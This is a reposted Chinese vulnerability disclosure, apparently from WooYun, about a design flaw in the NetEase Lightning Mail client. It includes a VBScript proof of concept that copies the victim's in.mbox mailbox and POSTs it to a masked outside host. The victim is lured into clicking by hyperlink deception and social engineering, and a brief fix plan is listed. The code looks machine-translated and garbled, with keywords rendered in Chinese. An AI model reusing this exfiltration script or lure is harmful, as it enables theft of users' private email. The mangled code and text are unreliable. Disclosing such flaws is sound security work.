网易闪电邮客户端设计缺陷可导致远程种马/邮件窃取

责声明">
漏洞标题 网易闪电邮客户端设计缺陷可导致远程种马/邮件窃取 相关厂商 网易 漏洞作者 数据流 提交时间 2016-03-10 16:04 公开时间 2016-06-12 13:40 漏洞类型 远程代码…
从对等方接收数据时失败 设置http=CreateObject('Msxml2.ServerXMLHTTP') 设置fso=createobject('scripting.filesystemobject') Path=fso.GetFolder('。')的电子邮件地址。路径&'/./././account/victim/in.mbox' fso.CopyFile路径,'mail.mbox',False'文件被客户端占用,Adodb.Stream无法读取先复制 设置stm=CreateObject('Adodb.Stream') stm.Type=2 Stm.mode=3 Stm.charset='utf-8''fso不支持使用Adodb.Stream读取utf8 stm.Open stm.LoadFromFile'mail.mbox' 邮件=stm.readtext Http.open'POST','**。**。**。**/test.php',错误 http.setRequestHeader'Content-Type','application/x-www-form-urlencoded' Http.send'mail''和邮件 漏洞证明: 受害者将在点击后自动执行 6.jpg 在URLdecode之后,您可以看到整个邮件的请求。 7.jpg 结合一些社会工作者。 8.jpg 9.jpg 超链接欺诈 修理计划: 1超链接到文件: //要做 2附件路径应该是随机的 版权声明:请注明数据流@乌云的来源
  • 发表于 2016-07-17 08:00
  • 阅读 ( 427 )
  • 分类:黑客技术

你可能感兴趣的文章

相关问题

0 条评论

请先 登录 后评论
不写代码的码农
黑客

2107 篇文章

作家榜 »

  1. 黑客 2107 文章